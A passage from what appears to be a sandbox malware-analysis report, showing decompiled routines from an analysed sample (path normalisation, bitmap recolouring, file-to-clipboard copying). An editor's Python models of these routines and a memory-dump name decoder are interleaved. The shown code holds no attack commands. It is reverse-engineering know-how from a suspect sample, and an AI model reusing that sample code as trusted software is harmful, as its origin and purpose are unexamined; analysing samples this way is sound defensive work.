				wcscpy(_t50, ??);           /* ?? is whichever pointer was pushed before jumping to L4 */
				goto L11;
			}
			_push(__esi);                  /* first character is ':' (as decompiled): copied unchanged */
			goto L4;
		}


APIs
• wcschr.MSVCRT ref: 0040CB0B
• wcscpy.MSVCRT ref: 0040CB1B
  • Part of subcall function 0040546C: wcslen.MSVCRT ref: 0040547B
  • Part of subcall function 0040546C: wcslen.MSVCRT ref: 00405485
  • Part of subcall function 0040546C: _memicmp.MSVCRT ref: 004054A0
• wcscpy.MSVCRT ref: 0040CB6A
• wcscat.MSVCRT ref: 0040CB75
• memset.MSVCRT ref: 0040CB51
  • Part of subcall function 004059AA: GetWindowsDirectoryW.KERNEL32(004132D0,00000104,?,0040CBAA,?,?,00000000,00000208,00000000), ref: 004059C0
  • Part of subcall function 004059AA: wcscpy.MSVCRT ref: 004059D0
• memset.MSVCRT ref: 0040CB99
• memcpy.MSVCRT ref: 0040CBB4
• wcscat.MSVCRT ref: 0040CBC0
Strings
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
• String ID: \systemroot
• API String ID: 4173585201-1821301763
• Opcode ID: 197ef35b965182a27a0b5126cdc1684e529fecbe610c523fb1bd77083df9de9f
• Instruction ID: 3f83ceb5217c301b0de1b10fb1ff833d5e9f5f4e9ae752904631e86f644bb4d0
• Opcode Fuzzy Hash: 197ef35b965182a27a0b5126cdc1684e529fecbe610c523fb1bd77083df9de9f
• Instruction Fuzzy Hash: F821F8B2404314A9D621A7629C87EAB73FC9F04314F20467FB415F20C2FA7C75448B6E
Uniqueness Score: -1.00%
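For analysts who need to reproduce the paths this routine emits (for instance to turn the sample's stored file references into the locations it actually reads), here is the same branch logic as a small reference model. This is an added example written for this page, not code from the sample or from the Joe Sandbox report. It injects the Windows directory instead of calling GetWindowsDirectoryW, models subcall 0040546C as a case-insensitive substring search returning the match offset (inferred from its wcslen/wcslen/_memicmp calls and the `__esi + 0x16 + _t40 * 2` arithmetic), and the handling of a drive colon found mid-string follows an explicit assumption, since the decompiled `&(_t17[0])` and `__esi[0]` offsets are ambiguous.

```python
"""Reference model of the decompiled path normaliser E0040CAF2 (editor's own
Python, not code from the sample).  The Windows directory is injected instead
of calling GetWindowsDirectoryW, and the ':' handling follows the assumption
stated in the docstring of normalize_path()."""

# Stand-in for what subcall 004059AA obtains from GetWindowsDirectoryW().
DEFAULT_WINDOWS_DIR = r"C:\Windows"

SYSTEMROOT = "\\systemroot"   # the L"\\systemroot" literal in the listing


def find_ci(haystack: str, needle: str) -> int:
    r"""Case-insensitive substring search: match offset, or -1 if absent.

    Models subcall 0040546C (wcslen, wcslen, _memicmp): the caller treats a
    negative result as 'not found' and otherwise resumes 11 wide characters
    (0x16 bytes, the length of L"\systemroot") past the returned offset.
    """
    return haystack.lower().find(needle.lower())


def normalize_path(src: str, windows_dir: str = DEFAULT_WINDOWS_DIR) -> str:
    r"""Return the Win32-style path E0040CAF2 writes into its output buffer.

    Branches, in the order the listing tests them:
      1. a drive colon is present -> copied from the drive letter onward
         (ASSUMPTION: the decompiled `&(_t17[0])` / `__esi[0] == ':'` offsets
         are ambiguous; we assume "\??\C:\foo" is meant to yield "C:\foo" and
         that "C:\foo" comes back unchanged);
      2. "\systemroot" found anywhere, case-insensitively -> windows_dir plus
         whatever follows the match;
      3. any other leading backslash -> drive prefix of windows_dir plus src
         (memcpy of 4 bytes copies exactly the two wide chars L"X:");
      4. anything else -> unchanged (plain wcscpy).
    """
    if len(src) > 1 and src[1] == ":":          # branch 1a: already "X:..."
        return src
    colon = src.find(":", 1)                    # wcschr(&esi[1], L':')
    if colon != -1:                             # branch 1b (assumption above)
        return src[colon - 1:]
    pos = find_ci(src, SYSTEMROOT)              # E0040546C(esi, L"\\systemroot")
    if pos >= 0:                                # branch 2
        return windows_dir + src[pos + len(SYSTEMROOT):]
    if src.startswith("\\"):                    # branch 3: *esi == L'\\'
        return windows_dir[:2] + src            # memcpy(edi, windir, 4) -> "X:"
    return src                                  # branch 4: wcscpy(edi, esi)
```

Feeding the model the registry-style and NT-style paths recovered from a dump (for example `\systemroot\system32\...` entries) gives the concrete on-disk locations to check in the sandbox's file-access trace; the `find_ci` helper is deliberately a substring search rather than a prefix check, because the listing adds the match offset `_t40` before skipping the 11 characters, so a `\systemroot` component is honoured wherever it occurs.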

C-Code - Quality: 50%
		E00402DE1(void* __fp0) {
			void* _v24;
			void _v28;            /* BITMAP structure (0x18 bytes on 32-bit) filled in by GetObjectW */
			void* _v56;           /* HBITMAP returned by LoadImageW */
			intOrPtr _v60;
			void* _v64;
			void* _v72;
			void* _v76;
			intOrPtr _v84;
			long _v88;
			intOrPtr _v92;
			int _v96;
			int _v100;
			intOrPtr _v104;
			int _v108;
			int _v112;
			intOrPtr _v128;
			unsigned int _t51;
			signed char _t52;
			intOrPtr _t53;
			intOrPtr _t64;
			struct HDC__* _t75;

			/* LoadImageW(hInstance, MAKEINTRESOURCE(0x6e), IMAGE_BITMAP (0), 0, 0,
			   0x1060 == LR_LOADTRANSPARENT | LR_DEFAULTSIZE | LR_LOADMAP3DCOLORS):
			   loads bitmap resource 110 from the sample's own image. */
			_v56 = LoadImageW(GetModuleHandleW(0), 0x6e, 0, 0, 0, 0x1060);
			/* zero 6 dwords (0x18 bytes == sizeof(BITMAP)) before querying the handle */
			_v28 = 0;
			asm("stosd");
			asm("stosd");
			asm("stosd");
			asm("stosd");
			asm("stosd");
			GetObjectW(_v56, 0x18,  &_v28);   /* 0x18 == sizeof(BITMAP) */
                                                                                                                                                				_t75 = CreateCompatibleDC(0);
                                                                                                                                                				_v64 = SelectObject(_t75, _v72);
                                                                                                                                                				_v72 = GetSysColor(0xf);
                                                                                                                                                				_v88 = GetPixel(_t75, 0, 0);
                                                                                                                                                				_v96 = 0;
                                                                                                                                                				if(_v56 > 0) {
                                                                                                                                                					do {
                                                                                                                                                						_v100 = 0;
                                                                                                                                                						if(_v60 > 0) {
                                                                                                                                                							do {
                                                                                                                                                								_t51 = GetPixel(_t75, _v100, _v96);
                                                                                                                                                								if(_t51 != _v100) {
                                                                                                                                                									_t52 = _t51 & 0x000000ff;
                                                                                                                                                									_v92 = (_t51 & 0x000000ff) + (_t51 >> 0x00000010 & 0x000000ff) + _t52;
                                                                                                                                                									asm("fild dword [esp+0x20]");
                                                                                                                                                									asm("fistp qword [esp+0x28]");
                                                                                                                                                									_t64 = _v84;
                                                                                                                                                									_v92 = _t64;
                                                                                                                                                									asm("fisub dword [esp+0x20]");
                                                                                                                                                									asm("fldz");
                                                                                                                                                									asm("fcomp st0, st1");
                                                                                                                                                									asm("fnstsw ax");
                                                                                                                                                									if((_t52 & 0x00000041) == 0) {
                                                                                                                                                										asm("fchs");
                                                                                                                                                									}
                                                                                                                                                									asm("fcomp qword [0x410b70]");
                                                                                                                                                									asm("fnstsw ax");
                                                                                                                                                									_t53 = _t64 + 1;
                                                                                                                                                									if((_t52 & 0x00000001) != 0) {
                                                                                                                                                										_t53 = _t64;
                                                                                                                                                									}
                                                                                                                                                									_push(((_t53 + 0x00000080 & 0x000000ff) << 0x00000008 | _t53 + 0x00000080 & 0x000000ff) << 0x00000008 | _t53 + 0x00000080 & 0x000000ff);
                                                                                                                                                								} else {
                                                                                                                                                									_push(_v96);
                                                                                                                                                								}
                                                                                                                                                								SetPixel(_t75, _v112, _v108, ??);
                                                                                                                                                								_v128 = _v128 + 1;
                                                                                                                                                							} while (_v128 < _v88);
                                                                                                                                                						}
                                                                                                                                                						_v96 = _v96 + 1;
                                                                                                                                                					} while (_v96 < _v56);
                                                                                                                                                				}
                                                                                                                                                				SelectObject(_t75, _v76);
                                                                                                                                                				DeleteDC(_t75);
                                                                                                                                                				return _v104;
			}

                                                                                                                                                0x00402e07
                                                                                                                                                0x00402e0d
                                                                                                                                                0x00402e15
                                                                                                                                                0x00402e16
                                                                                                                                                0x00402e17
                                                                                                                                                0x00402e18
                                                                                                                                                0x00402e19
                                                                                                                                                0x00402e25
                                                                                                                                                0x00402e36
                                                                                                                                                0x00402e41
                                                                                                                                                0x00402e54
                                                                                                                                                0x00402e5e
                                                                                                                                                0x00402e62
                                                                                                                                                0x00402e66
                                                                                                                                                0x00402e6c
                                                                                                                                                0x00402e70
                                                                                                                                                0x00402e74
                                                                                                                                                0x00402e7a
                                                                                                                                                0x00402e83
                                                                                                                                                0x00402e89
                                                                                                                                                0x00402e9c
                                                                                                                                                0x00402ea3
                                                                                                                                                0x00402ea7
                                                                                                                                                0x00402eb3
                                                                                                                                                0x00402eb7
                                                                                                                                                0x00402ebb
                                                                                                                                                0x00402ebf
                                                                                                                                                0x00402ec3
                                                                                                                                                0x00402ec5
                                                                                                                                                0x00402ec7
                                                                                                                                                0x00402ecc
                                                                                                                                                0x00402ece
                                                                                                                                                0x00402ece
                                                                                                                                                0x00402ed0
                                                                                                                                                0x00402ed6
                                                                                                                                                0x00402edb
                                                                                                                                                0x00402ede
                                                                                                                                                0x00402ee0
                                                                                                                                                0x00402ee0
                                                                                                                                                0x00402ef6
                                                                                                                                                0x00402e8b
                                                                                                                                                0x00402e8b
                                                                                                                                                0x00402e8b
                                                                                                                                                0x00402f00
                                                                                                                                                0x00402f06
                                                                                                                                                0x00402f0e
                                                                                                                                                0x00402e7a
                                                                                                                                                0x00402f18
                                                                                                                                                0x00402f20
                                                                                                                                                0x00402e6c
                                                                                                                                                0x00402f2f
                                                                                                                                                0x00402f36
                                                                                                                                                0x00402f46

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0000006E,00000000,00000000,00000000,00001060), ref: 00402DFA
                                                                                                                                                • LoadImageW.USER32 ref: 00402E01
                                                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00402E25
                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00402E2C
                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00402E39
                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00402E45
                                                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00402E58
                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 00402E83
                                                                                                                                                • SetPixel.GDI32(00000000,?,?,?), ref: 00402F00
                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00402F2F
                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00402F36
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ObjectPixel$Select$ColorCompatibleCreateDeleteHandleImageLoadModule
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2468767547-0
                                                                                                                                                • Opcode ID: 7033ca8cb5081ea6992c12c0c258a27d757a0da9ef6fc35bb73742e8d51b50bd
                                                                                                                                                • Instruction ID: 6edf35894f1bf038c9276b60c95336d8acf92c36c4475dd3a027cf99260808bc
                                                                                                                                                • Opcode Fuzzy Hash: 7033ca8cb5081ea6992c12c0c258a27d757a0da9ef6fc35bb73742e8d51b50bd
                                                                                                                                                • Instruction Fuzzy Hash: B9419A71508311ABC7109F60DA4896FBBF8FBC9B51F00493EF585A2291C7789448DBA6
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                			E00405F82() {
                                                                                                                                                				int _v8;
                                                                                                                                                				int _v12;
                                                                                                                                                				void* _v16;
                                                                                                                                                				long _v20;
                                                                                                                                                				long _v24;
                                                                                                                                                				void* _v28;
                                                                                                                                                				intOrPtr _v44;
                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                				void _v52;
                                                                                                                                                				struct HDC__* _t46;
                                                                                                                                                
                                                                                                                                                				_v16 = LoadImageW(GetModuleHandleW(0), 0x6e, 0, 0, 0, 0x1060);
                                                                                                                                                				_v52 = 0;
                                                                                                                                                				asm("stosd");
                                                                                                                                                				asm("stosd");
                                                                                                                                                				asm("stosd");
                                                                                                                                                				asm("stosd");
                                                                                                                                                				asm("stosd");
                                                                                                                                                				GetObjectW(_v16, 0x18,  &_v52);
                                                                                                                                                				_t46 = CreateCompatibleDC(0);
                                                                                                                                                				_v28 = SelectObject(_t46, _v16);
                                                                                                                                                				_v24 = GetSysColor(0xf);
                                                                                                                                                				_v20 = GetPixel(_t46, 0, 0);
                                                                                                                                                				_v12 = 0;
                                                                                                                                                				if(_v44 > 0) {
                                                                                                                                                					do {
                                                                                                                                                						_v8 = 0;
                                                                                                                                                						if(_v48 > 0) {
                                                                                                                                                							do {
                                                                                                                                                								if(GetPixel(_t46, _v8, _v12) == _v20) {
                                                                                                                                                									SetPixel(_t46, _v8, _v12, _v24);
                                                                                                                                                								}
                                                                                                                                                								_v8 = _v8 + 1;
                                                                                                                                                							} while (_v8 < _v48);
                                                                                                                                                						}
                                                                                                                                                						_v12 = _v12 + 1;
                                                                                                                                                					} while (_v12 < _v44);
                                                                                                                                                				}
                                                                                                                                                				SelectObject(_t46, _v28);
                                                                                                                                                				DeleteDC(_t46);
                                                                                                                                                				return _v16;
			}

                                                                                                                                                0x00405fa5
                                                                                                                                                0x00405faa
                                                                                                                                                0x00405fb0
                                                                                                                                                0x00405fb1
                                                                                                                                                0x00405fb2
                                                                                                                                                0x00405fb3
                                                                                                                                                0x00405fb4
                                                                                                                                                0x00405fbe
                                                                                                                                                0x00405fce
                                                                                                                                                0x00405fd9
                                                                                                                                                0x00405feb
                                                                                                                                                0x00405ff3
                                                                                                                                                0x00405ff6
                                                                                                                                                0x00405ff9
                                                                                                                                                0x00405ffb
                                                                                                                                                0x00405ffe
                                                                                                                                                0x00406001
                                                                                                                                                0x00406003
                                                                                                                                                0x0040600f
                                                                                                                                                0x0040601b
                                                                                                                                                0x0040601b
                                                                                                                                                0x00406021
                                                                                                                                                0x00406027
                                                                                                                                                0x00406003
                                                                                                                                                0x0040602c
                                                                                                                                                0x00406032
                                                                                                                                                0x00405ffb
                                                                                                                                                0x0040603b
                                                                                                                                                0x00406042
                                                                                                                                                0x0040604f

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00405F8E
                                                                                                                                                • LoadImageW.USER32 ref: 00405F9F
                                                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00405FBE
                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00405FC5
                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00405FD1
                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00405FDC
                                                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00405FEE
                                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0040600A
                                                                                                                                                • SetPixel.GDI32(00000000,?,?,?), ref: 0040601B
                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 0040603B
                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 00406042
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ObjectPixel$Select$ColorCompatibleCreateDeleteHandleImageLoadModule
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2468767547-0
                                                                                                                                                • Opcode ID: 1a7923fc47ade543c6afb8f7e3d9ec78faebe15cd473db001480de50e0d72165
                                                                                                                                                • Instruction ID: 96ffd5419d12e5b7e39f9d209f068ed4cf2d1907ffa725acb483dd1c78e641ad
                                                                                                                                                • Opcode Fuzzy Hash: 1a7923fc47ade543c6afb8f7e3d9ec78faebe15cd473db001480de50e0d72165
                                                                                                                                                • Instruction Fuzzy Hash: A321F0B5D00219FBCB21ABE4DE889EEBFB9FF08751F104876F601B2152C7745A449BA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E00405559(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                				long _v8;
                                                                                                                                                				void* _v12;
                                                                                                                                                				long _v16;
                                                                                                                                                				void* _t17;
                                                                                                                                                				void* _t32;
                                                                                                                                                				void* _t37;
                                                                                                                                                				long _t39;
                                                                                                                                                
                                                                                                                                                				_v8 = _v8 & 0x00000000;
                                                                                                                                                				EmptyClipboard();
                                                                                                                                                				_t17 = E00405338(_a4);
                                                                                                                                                				_v12 = _t17;
                                                                                                                                                				if(_t17 == 0xffffffff) {
                                                                                                                                                					_v8 = GetLastError();
                                                                                                                                                				} else {
                                                                                                                                                					_t39 = GetFileSize(_t17, 0);
                                                                                                                                                					_t5 = _t39 + 2; // 0x2
                                                                                                                                                					_t32 = GlobalAlloc(0x2000, _t5);
                                                                                                                                                					if(_t32 == 0) {
                                                                                                                                                						L4:
                                                                                                                                                						_v8 = GetLastError();
                                                                                                                                                					} else {
                                                                                                                                                						_t37 = GlobalLock(_t32);
                                                                                                                                                						if(ReadFile(_v12, _t37, _t39,  &_v16, 0) == 0) {
                                                                                                                                                							goto L4;
                                                                                                                                                						} else {
                                                                                                                                                							 *(_t37 + (_t39 >> 1) * 2) =  *(_t37 + (_t39 >> 1) * 2) & 0x00000000;
                                                                                                                                                							GlobalUnlock(_t32);
                                                                                                                                                							SetClipboardData(0xd, _t32);
                                                                                                                                                						}
                                                                                                                                                					}
                                                                                                                                                					CloseHandle(_v12);
                                                                                                                                                				}
                                                                                                                                                				CloseClipboard();
                                                                                                                                                				return _v8;
			}

Instruction addresses for the statements of E00405559 above (disassembly column): 0x0040555f, 0x00405563, 0x0040556c, 0x00405575, 0x00405578, 0x004055f1, 0x0040557a, 0x00405586, 0x00405588, 0x00405597, 0x0040559b, 0x004055d4, 0x004055da, 0x0040559d, 0x004055a6, 0x004055b9, 0x00000000, 0x004055bb, 0x004055bd, 0x004055c3, 0x004055cc, 0x004055cc, 0x004055b9, 0x004055e0, 0x004055e8, 0x004055f4, 0x004055fe

                                                                                                                                                APIs
                                                                                                                                                • EmptyClipboard.USER32 ref: 00405563
                                                                                                                                                  • Part of subcall function 00405338: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,00403FF7,?,?,00000000,00403B9A,?), ref: 0040534A
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00405580
                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 00405591
                                                                                                                                                • GlobalLock.KERNEL32 ref: 0040559E
                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 004055B1
                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004055C3
                                                                                                                                                • SetClipboardData.USER32 ref: 004055CC
                                                                                                                                                • GetLastError.KERNEL32 ref: 004055D4
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004055E0
                                                                                                                                                • GetLastError.KERNEL32 ref: 004055EB
                                                                                                                                                • CloseClipboard.USER32 ref: 004055F4
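The routine E00405559 above opens a file through the subcall E00405338 (CreateFileW), reads it whole into a GlobalAlloc block of size + 2 bytes, stores one 16-bit zero at the even-aligned offset (size >> 1) * 2 and hands the block to SetClipboardData with format 0xd, which is the standard CF_UNICODETEXT value. The following is an added example, not code from the sample or from the report: it models exactly that buffer handling in plain Python on constructed input, so the effect of the terminator store on odd-sized, BOM-prefixed or non-UTF-16 files can be checked. The names CF_UNICODETEXT for 0xd and GMEM_SHARE for the GlobalAlloc flag 0x2000 are the standard Win32 constants.

```python
# Added example (not code from the analysed sample or from the report): a plain-Python
# model of the buffer handling in the decompiled routine E00405559, so the effect of
# the line  *(buf + (size >> 1) * 2) = 0  can be checked on sample input.
# The routine allocates size + 2 bytes, reads the whole file into it, writes one
# 16-bit zero at an even offset and calls SetClipboardData(0xd, ...), i.e. the file
# is published as CF_UNICODETEXT. All inputs below are constructed test data.

CF_UNICODETEXT = 0xD          # first argument of SetClipboardData in the decompiled code
GMEM_SHARE = 0x2000           # GlobalAlloc flag used by the routine; no GMEM_ZEROINIT


def build_clipboard_block(file_bytes: bytes) -> bytes:
    """Return the contents of the GlobalAlloc'd block as SetClipboardData receives it.

    Mirrors: buf = GlobalAlloc(GMEM_SHARE, size + 2); ReadFile(h, buf, size, ...);
             *(uint16_t *)(buf + (size >> 1) * 2) = 0;
    """
    size = len(file_bytes)
    buf = bytearray(size + 2)              # GlobalAlloc(0x2000, size + 2)
    buf[:size] = file_bytes                # ReadFile(..., size, ...)
    term = (size >> 1) * 2                 # even-aligned terminator offset:
                                           #   size for even sizes, size - 1 for odd sizes
    buf[term:term + 2] = b"\x00\x00"       # the 16-bit store; for odd sizes this
                                           # overwrites the file's last byte
    return bytes(buf)


def clipboard_text(block: bytes) -> str:
    """Decode the block the way a CF_UNICODETEXT consumer does: UTF-16LE up to the wide NUL."""
    end = 0
    while end + 1 < len(block) and block[end:end + 2] != b"\x00\x00":
        end += 2
    return block[:end].decode("utf-16-le", errors="replace")


def paste_result(file_bytes: bytes) -> str:
    """What a paste would yield after the routine ran on a file holding these bytes."""
    return clipboard_text(build_clipboard_block(file_bytes))


if __name__ == "__main__":
    samples = {                                            # constructed test files
        "utf16 even": "hi".encode("utf-16-le"),            # b"h\x00i\x00"
        "utf16 odd":  "hi".encode("utf-16-le") + b"X",     # stray trailing byte
        "utf16 bom":  b"\xff\xfe" + "ok".encode("utf-16-le"),  # BOM-prefixed text
        "ascii":      b"hello",                            # not UTF-16 at all
        "empty":      b"",
    }
    for label, data in samples.items():
        print(f"{label:10s} -> {paste_result(data)!r}")
```

Three points an analyst can read off from running it: a file of odd length loses its final byte to the terminator, a UTF-16 BOM is not stripped and is pasted as U+FEFF, and a plain ASCII file is reinterpreted as UTF-16 so a paste yields two-byte characters rather than the original text; the routine is only meaningful for UTF-16 input. The decompiled code also uses the GetFileSize result without checking it for INVALID_FILE_SIZE; that path is not modelled here.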
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
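The "Memory Dump Source" lists above (this one and the identical one for the previous function) name each dumped region with six dot-separated fields. The following added example, which is not code from the report or from the sample, decodes those names so the protection and region type can be read off directly. The field layout process.dump.id.base.protect.type.sdmp is inferred from the names on this page; the assumption that protect and type carry the Win32 PAGE_* protection and MEM_* region-type values is the author's (the constants themselves are standard Windows values), and whether the first field is a PID or a process index is not stated on the page.

```python
# Added example (not code from the report or the analysed sample): a decoder for the
# "Memory Dump Source" file names, so the protection and region type of each dumped
# region can be read off without a lookup. ASSUMPTIONS: the field layout
# <process>.<dump#>.<id>.<base>.<protect>.<type>.sdmp is inferred from the names on
# the page, and <protect>/<type> are taken to be the Win32 PAGE_* and MEM_* values.
import re

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXEC_MASK = 0xF0   # any PAGE_EXECUTE* bit set

_NAME = re.compile(
    r"^(?P<process>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<ident>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<mtype>[0-9A-Fa-f]{8})\.sdmp$"
)


def parse_dump_name(name: str) -> dict:
    """Split one .sdmp file name into its fields; raises ValueError on anything else."""
    m = _NAME.match(name.strip())
    if not m:
        raise ValueError(f"not a dump name: {name!r}")
    protect = int(m["protect"], 16)
    mtype = int(m["mtype"], 16)
    mods = [n for bit, n in PAGE_MODIFIERS.items() if protect & bit]
    return {
        "process": int(m["process"], 16),
        "dump": int(m["dump"], 16),
        "ident": m["ident"],
        "base": int(m["base"], 16),
        "protect": protect,
        "protect_name": "|".join([PAGE_PROTECT.get(protect & 0xFF, "PAGE_?")] + mods),
        "type": mtype,
        "type_name": MEM_TYPE.get(mtype, "MEM_?"),
        "executable": bool(protect & EXEC_MASK),
    }


def private_executable_regions(names) -> list:
    """Bases of regions that are executable and MEM_PRIVATE, i.e. code that was not
    mapped by the image loader, which is what runtime-unpacked code looks like."""
    out = []
    for n in names:
        d = parse_dump_name(n)
        if d["executable"] and d["type"] == 0x20000:
            out.append(d["base"])
    return out


# The five names from the report's "Memory Dump Source" list.
REPORT_DUMPS = [
    "0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp",
    "0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp",
    "0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp",
    "0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp",
    "0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp",
]

if __name__ == "__main__":
    for n in REPORT_DUMPS:
        d = parse_dump_name(n)
        print(f"{d['base']:#010x}  {d['protect_name']:<22s} {d['type_name']}")
    print("private+exec:", [hex(b) for b in private_executable_regions(REPORT_DUMPS)])
```

Under these assumptions the five regions form a contiguous image at 0x400000 (header read-only, 0x401000 executable, data read-write), all typed MEM_PRIVATE rather than MEM_IMAGE; a module mapped by the loader would be MEM_IMAGE, so private executable memory laid out like a PE is the signature of code unpacked at runtime, which is what the dump's "based on PE: true" note points at.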
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3604893535-0
                                                                                                                                                • Opcode ID: 59ceb6b3a235d8f074aa04a98775147e6836de81911978fc41fe46ee66c441fd
                                                                                                                                                • Instruction ID: 38fb76984466a98f40b20a1ffdead2548e4c0d81c76d76b6fa97ca59cfc580cd
                                                                                                                                                • Opcode Fuzzy Hash: 59ceb6b3a235d8f074aa04a98775147e6836de81911978fc41fe46ee66c441fd
                                                                                                                                                • Instruction Fuzzy Hash: 23114F76500605FBDB20ABB0EE4CA9F7BB8EB04351F104176F502F6691DB749909CB68
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                			E0040228C(void* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                				struct _SYSTEMTIME _v88;
                                                                                                                                                				void* _v92;
                                                                                                                                                				struct _FILETIME _v96;
                                                                                                                                                				void* __edi;
                                                                                                                                                				signed int _t29;
                                                                                                                                                				signed int _t34;
                                                                                                                                                				signed int _t39;
                                                                                                                                                				char* _t44;
                                                                                                                                                				void* _t56;
                                                                                                                                                				signed int _t60;
                                                                                                                                                				signed int _t64;
                                                                                                                                                				signed int _t70;
                                                                                                                                                				signed int _t77;
                                                                                                                                                				long _t90;
                                                                                                                                                				intOrPtr _t91;
                                                                                                                                                				void* _t97;
                                                                                                                                                				signed int _t98;
                                                                                                                                                				signed int _t99;
                                                                                                                                                
                                                                                                                                                				_t97 = __esi;
                                                                                                                                                				_t81 =  *((intOrPtr*)(__esi + 0x10));
                                                                                                                                                				_t91 = _a4;
                                                                                                                                                				_t29 = E00406306(0x412320,  *((intOrPtr*)(__esi + 0x10)));
                                                                                                                                                				_t77 = 0x40f454;
                                                                                                                                                				if(_t29 != 0) {
                                                                                                                                                					_t77 = _t29;
                                                                                                                                                				}
                                                                                                                                                				_t99 = _t98 | 0xffffffff;
                                                                                                                                                				_t106 =  *(_t97 + 0x40) & 0x00004000;
                                                                                                                                                				if(( *(_t97 + 0x40) & 0x00004000) != 0) {
                                                                                                                                                					E004063DD(_t99, _t81, _t91, _t106, ".");
                                                                                                                                                				}
                                                                                                                                                				E004063DD(_t99, _t81, _t91, _t106, _t77);
                                                                                                                                                				_t78 = "\t";
                                                                                                                                                				E004063DD(_t99, _t81, _t91, _t106, "\t");
